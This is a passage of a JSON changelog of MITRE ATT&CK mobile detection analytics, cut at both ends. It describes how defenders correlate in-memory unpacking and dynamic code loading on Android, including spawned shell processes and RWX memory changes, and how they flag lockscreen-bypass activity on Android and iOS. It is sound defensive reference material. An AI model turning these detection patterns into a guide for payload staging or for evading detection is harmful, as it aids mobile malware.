                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to181__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to181__0\"><a href=\"#difflib_chg_to181__top\">t</a></td><td class=\"diff_header\" id=\"from181_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;known&nbsp;software&nbsp;p</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to181__top\">t</a></td><td class=\"diff_header\" id=\"to181_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">From&nbsp;the&nbsp;defender&nbsp;view:&nbsp;a&nbsp;sandboxed&nbsp;process&nbsp;receives/creates</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ackers&nbsp;or&nbsp;artifacts&nbsp;of&nbsp;packing&nbsp;techniques.&nbsp;Packing&nbsp;is&nbsp;not&nbsp;a&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;a&nbsp;high-entropy&nbsp;Mach-O/bundle&nbsp;or&nbsp;encrypted&nbsp;segment,&nbsp;performs</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">definitive&nbsp;indicator&nbsp;of&nbsp;malicious&nbsp;activity,&nbsp;because&nbsp;as&nbsp;legit</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;in-memory&nbsp;decrypt/unpack&nbsp;(mmap/mprotect&nbsp;RW\u2192RX&nbsp;or&nbsp;RWX),&nbsp;opti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">imate&nbsp;software&nbsp;may&nbsp;use&nbsp;packing&nbsp;techniques&nbsp;to&nbsp;reduce&nbsp;binary&nbsp;s</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">onally&nbsp;drops&nbsp;a&nbsp;transient&nbsp;image&nbsp;in&nbsp;app-writable&nbsp;dirs,&nbsp;then&nbsp;lo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ize&nbsp;or&nbsp;to&nbsp;protect&nbsp;proprietary&nbsp;code.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ads&nbsp;it&nbsp;through&nbsp;dyld/dlopen&nbsp;or&nbsp;spawns&nbsp;it.&nbsp;We&nbsp;correlate:&nbsp;(1)&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">paque&nbsp;blob&nbsp;write/arrival&nbsp;\u2192&nbsp;(2)&nbsp;kernel&nbsp;memory&nbsp;protection&nbsp;chan</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ges&nbsp;\u2192&nbsp;(3)&nbsp;dyld/dlopen&nbsp;from&nbsp;app-writable&nbsp;path&nbsp;or&nbsp;posix_spawn&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">of&nbsp;a&nbsp;recently&nbsp;created&nbsp;image&nbsp;\u2192&nbsp;(4)&nbsp;(optional)&nbsp;code-sign&nbsp;evalu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ation&nbsp;anomalies&nbsp;for&nbsp;the&nbsp;new&nbsp;image.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--d4dc642d-922b-4476-ad3f-ba23c43702f5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-28 17:28:26.921000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0644#AN1722",
                            "external_id": "AN1722"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1722",
                    "description": "From the defender view: a sandboxed app handles a high-entropy executable blob, performs rapid decode/decrypt in memory (often with RW\u2192RX or execmem friction), optionally emits a transient .dex/.so into app-writable paths, then immediately loads/executes it (DexClassLoader/dlopen) or spawns a helper. We correlate: (1) opaque blob write/arrival \u2192 (2) decode/unpack or memory protection change \u2192 (3) new code artifact or byte[] class definition \u2192 (4) dynamic load/exec within a tight window.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "android:logcat",
                            "channel": "Create/write of high-entropy files in /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/<...> with .dex/.so/.jar/.tmp/.bin"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
                            "name": "android:logcat",
                            "channel": "DexClassLoader/PathClassLoader loading from app-writable path OR reflective defineClass on byte[] payload"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "android:logcat",
                            "channel": "dlopen of a recently created .so OR short-lived child (/system/bin/sh,toybox,linker) spawned by app_process"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Correlation window from write\u2192unpack\u2192load (e.g., 5\u201345s; device-dependent)."
                        },
                        {
                            "field": "PayloadEntropyThreshold",
                            "description": "Entropy to flag packed blobs (e.g., \u2265 7.2)."
                        },
                        {
                            "field": "RWXPageMinKB",
                            "description": "Minimum RWX allocation size to reduce noise (e.g., \u2265 32KB)."
                        },
                        {
                            "field": "ExecPathRegex",
                            "description": "Regex for suspicious .dex/.so/.jar/temp paths under app container."
                        },
                        {
                            "field": "KnownGoodLoadersAllowlist",
                            "description": "Legit libraries/bundles expected to load from writable paths (test/dev builds)."
                        },
                        {
                            "field": "UserContext",
                            "description": "Foreground/background, Work Profile, developer mode to scope alerts."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Correlation window from write\\u2192unpack\\u2192load (e.g., 5\\u201345s; device-dependent).\"}, {\"field\": \"PayloadEntropyThreshold\", \"description\": \"Entropy to flag packed blobs (e.g., \\u2265 7.2).\"}, {\"field\": \"RWXPageMinKB\", \"description\": \"Minimum RWX allocation size to reduce noise (e.g., \\u2265 32KB).\"}, {\"field\": \"ExecPathRegex\", \"description\": \"Regex for suspicious .dex/.so/.jar/temp paths under app container.\"}, {\"field\": \"KnownGoodLoadersAllowlist\", \"description\": \"Legit libraries/bundles expected to load from writable paths (test/dev builds).\"}, {\"field\": \"UserContext\", \"description\": \"Foreground/background, Work Profile, developer mode to scope alerts.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-28 17:28:26.921000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"From the defender view: a sandboxed app handles a high-entropy executable blob, performs rapid decode/decrypt in memory (often with RW\\u2192RX or execmem friction), optionally emits a transient .dex/.so into app-writable paths, then immediately loads/executes it (DexClassLoader/dlopen) or spawns a helper. We correlate: (1) opaque blob write/arrival \\u2192 (2) decode/unpack or memory protection change \\u2192 (3) new code artifact or byte[] class definition \\u2192 (4) dynamic load/exec within a tight window.\", \"old_value\": \"Application vetting services could look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because as legitimate software may use packing techniques to reduce binary size or to protect proprietary code.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"android:logcat\", \"channel\": \"Create/write of high-entropy files in /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/<...> with .dex/.so/.jar/.tmp/.bin\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1\", \"name\": \"android:logcat\", \"channel\": \"DexClassLoader/PathClassLoader loading from app-writable path OR reflective defineClass on byte[] payload\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"android:logcat\", \"channel\": \"dlopen of a recently created .so OR short-lived child (/system/bin/sh,toybox,linker) spawned by app_process\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to136__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to136__0\"><a href=\"#difflib_chg_to136__top\">t</a></td><td class=\"diff_header\" id=\"from136_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;known&nbsp;software&nbsp;p</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to136__top\">t</a></td><td class=\"diff_header\" id=\"to136_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">From&nbsp;the&nbsp;defender&nbsp;view:&nbsp;a&nbsp;sandboxed&nbsp;app&nbsp;handles&nbsp;a&nbsp;high-entro</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ackers&nbsp;or&nbsp;artifacts&nbsp;of&nbsp;packing&nbsp;techniques.&nbsp;Packing&nbsp;is&nbsp;not&nbsp;a&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">py&nbsp;executable&nbsp;blob,&nbsp;performs&nbsp;rapid&nbsp;decode/decrypt&nbsp;in&nbsp;memory&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">definitive&nbsp;indicator&nbsp;of&nbsp;malicious&nbsp;activity,&nbsp;because&nbsp;as&nbsp;legit</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">(often&nbsp;with&nbsp;RW\u2192RX&nbsp;or&nbsp;execmem&nbsp;friction),&nbsp;optionally&nbsp;emits&nbsp;a&nbsp;t</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">imate&nbsp;software&nbsp;may&nbsp;use&nbsp;packing&nbsp;techniques&nbsp;to&nbsp;reduce&nbsp;binary&nbsp;s</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ransient&nbsp;.dex/.so&nbsp;into&nbsp;app-writable&nbsp;paths,&nbsp;then&nbsp;immediately&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ize&nbsp;or&nbsp;to&nbsp;protect&nbsp;proprietary&nbsp;code.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">loads/executes&nbsp;it&nbsp;(DexClassLoader/dlopen)&nbsp;or&nbsp;spawns&nbsp;a&nbsp;helper</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">.&nbsp;We&nbsp;correlate:&nbsp;(1)&nbsp;opaque&nbsp;blob&nbsp;write/arrival&nbsp;\u2192&nbsp;(2)&nbsp;decode/u</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">npack&nbsp;or&nbsp;memory&nbsp;protection&nbsp;change&nbsp;\u2192&nbsp;(3)&nbsp;new&nbsp;code&nbsp;artifact&nbsp;or</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;byte[]&nbsp;class&nbsp;definition&nbsp;\u2192&nbsp;(4)&nbsp;dynamic&nbsp;load/exec&nbsp;within&nbsp;a&nbsp;ti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ght&nbsp;window.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--52a370ec-dca2-45e0-bba7-7384816945e8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-11 16:02:58.868000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0645#AN1723",
                            "external_id": "AN1723"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1723",
                    "description": "A lock-state transition telemetry, special access or privileged interaction capability, security-sensitive framework use, and immediate downstream activity while the user-interaction context is weak or inconsistent. This yields stronger coverage on Android than iOS.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
                            "name": "android:MDMLog",
                            "channel": "Biometric, credential, lockscreen, trust-agent, Smart Lock, or device-admin-related protected device configuration changed"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Application gains or is observed with elevated interaction capability such as accessibility, overlay, device admin, notification access, or other authentication-adjacent special access"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "pplication or service remains active, foregrounds, or overlays during device locked state or immediately at unlock transition with weak recent user interaction context"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Maximum allowed time between locked-state boundary, suspicious app/framework activity, and unlock transition."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Approved apps permitted to hold accessibility, overlay, device-admin, or other authentication-adjacent special access."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether a benign authentication-adjacent app is expected to be visible in the foreground during unlock-related operations."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Time threshold for treating the unlock as user-driven based on touch, motion, or interaction context."
                        },
                        {
                            "field": "ExpectedUnlockPopulation",
                            "description": "User or device groups expected to use alternative lockscreen workflows, enterprise trust agents, or kiosk-like modes."
                        },
                        {
                            "field": "TrustedDestinationAllowList",
                            "description": "Expected destinations contacted immediately after legitimate unlock by enterprise apps."
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Threshold for suspicious immediate post-unlock outbound traffic."
                        },
                        {
                            "field": "SensorUseAllowList",
                            "description": "Apps expected to access camera or other sensors near the authentication boundary."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Maximum allowed time between locked-state boundary, suspicious app/framework activity, and unlock transition.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Approved apps permitted to hold accessibility, overlay, device-admin, or other authentication-adjacent special access.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether a benign authentication-adjacent app is expected to be visible in the foreground during unlock-related operations.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Time threshold for treating the unlock as user-driven based on touch, motion, or interaction context.\"}, {\"field\": \"ExpectedUnlockPopulation\", \"description\": \"User or device groups expected to use alternative lockscreen workflows, enterprise trust agents, or kiosk-like modes.\"}, {\"field\": \"TrustedDestinationAllowList\", \"description\": \"Expected destinations contacted immediately after legitimate unlock by enterprise apps.\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Threshold for suspicious immediate post-unlock outbound traffic.\"}, {\"field\": \"SensorUseAllowList\", \"description\": \"Apps expected to access camera or other sensors near the authentication boundary.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-11 16:02:58.868000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"A lock-state transition telemetry, special access or privileged interaction capability, security-sensitive framework use, and immediate downstream activity while the user-interaction context is weak or inconsistent. This yields stronger coverage on Android than iOS.\", \"old_value\": \"Mobile security products can often alert the user if their device is vulnerable to known exploits.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2\", \"name\": \"android:MDMLog\", \"channel\": \"Biometric, credential, lockscreen, trust-agent, Smart Lock, or device-admin-related protected device configuration changed\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Application gains or is observed with elevated interaction capability such as accessibility, overlay, device admin, notification access, or other authentication-adjacent special access\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"pplication or service remains active, foregrounds, or overlays during device locked state or immediately at unlock transition with weak recent user interaction context\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to170__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to170__0\"><a href=\"#difflib_chg_to170__top\">t</a></td><td class=\"diff_header\" id=\"from170_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;security&nbsp;products&nbsp;can&nbsp;often&nbsp;alert&nbsp;the&nbsp;user&nbsp;if&nbsp;their&nbsp;d</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to170__top\">t</a></td><td class=\"diff_header\" id=\"to170_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">A&nbsp;lock-state&nbsp;transition&nbsp;telemetry,&nbsp;special&nbsp;access&nbsp;or&nbsp;privile</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">evice&nbsp;is&nbsp;vulnerable&nbsp;to&nbsp;known&nbsp;exploits.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ged&nbsp;interaction&nbsp;capability,&nbsp;security-sensitive&nbsp;framework&nbsp;use</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;and&nbsp;immediate&nbsp;downstream&nbsp;activity&nbsp;while&nbsp;the&nbsp;user-interacti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on&nbsp;context&nbsp;is&nbsp;weak&nbsp;or&nbsp;inconsistent.&nbsp;This&nbsp;yields&nbsp;stronger&nbsp;cov</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">erage&nbsp;on&nbsp;Android&nbsp;than&nbsp;iOS.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--81a49b9b-c8cf-438c-bea0-e09149f50b34",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-11 16:09:37.177000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0645#AN1724",
                            "external_id": "AN1724"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1724",
                    "description": "Defender correlates an iOS-specific reduced-confidence chain where a supervised or managed device transitions from locked or inactive state to interactive or application-active state with weak evidence of expected user authentication, often accompanied by abnormal protected posture change, trust-state change, unexpected app wake, sensor use, or immediate downstream communication. Because direct visibility into lockscreen bypass mechanics on iOS is limited, the analytic prioritizes strong device-state effects and post-unlock behavior rather than pretending to observe the exact bypass method.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
                            "name": "iOS:MDMLog",
                            "channel": "Passcode, biometrics, attention-aware authentication, or supervised-device lock policy changed in a way that weakens or alters the authentication boundary"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application wakes, becomes active, refreshes, or foregrounds immediately after locked or inactive state transition with weak recent user interaction"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Maximum allowed span between locked or inactive device state, suspicious app/service activity, and interactive transition."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps allowed to wake, foreground, or access protected resources near legitimate authentication events."
                        },
                        {
                            "field": "SupervisedOnly",
                            "description": "Whether the analytic should only apply to supervised devices with high-confidence MDM policy telemetry."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Time threshold for treating the transition as expected and user-driven."
                        },
                        {
                            "field": "ExpectedUnlockPopulation",
                            "description": "User or device groups expected to use atypical enterprise lockscreen workflows, kiosk-like modes, or accessibility accommodations."
                        },
                        {
                            "field": "SensorUseAllowList",
                            "description": "Apps expected to access camera or biometric-adjacent resources near the authentication boundary."
                        },
                        {
                            "field": "TrustedDestinationAllowList",
                            "description": "Expected destinations contacted immediately after legitimate app activation post-authentication."
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Threshold for suspicious immediate outbound traffic after suspicious unlock-adjacent activity."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Maximum allowed span between locked or inactive device state, suspicious app/service activity, and interactive transition.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps allowed to wake, foreground, or access protected resources near legitimate authentication events.\"}, {\"field\": \"SupervisedOnly\", \"description\": \"Whether the analytic should only apply to supervised devices with high-confidence MDM policy telemetry.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Time threshold for treating the transition as expected and user-driven.\"}, {\"field\": \"ExpectedUnlockPopulation\", \"description\": \"User or device groups expected to use atypical enterprise lockscreen workflows, kiosk-like modes, or accessibility accommodations.\"}, {\"field\": \"SensorUseAllowList\", \"description\": \"Apps expected to access camera or biometric-adjacent resources near the authentication boundary.\"}, {\"field\": \"TrustedDestinationAllowList\", \"description\": \"Expected destinations contacted immediately after legitimate app activation post-authentication.\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Threshold for suspicious immediate outbound traffic after suspicious unlock-adjacent activity.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-11 16:09:37.177000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates an iOS-specific reduced-confidence chain where a supervised or managed device transitions from locked or inactive state to interactive or application-active state with weak evidence of expected user authentication, often accompanied by abnormal protected posture change, trust-state change, unexpected app wake, sensor use, or immediate downstream communication. Because direct visibility into lockscreen bypass mechanics on iOS is limited, the analytic prioritizes strong device-state effects and post-unlock behavior rather than pretending to observe the exact bypass method.\", \"old_value\": \"Mobile security products can often alert the user if their device is vulnerable to known exploits.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2\", \"name\": \"iOS:MDMLog\", \"channel\": \"Passcode, biometrics, attention-aware 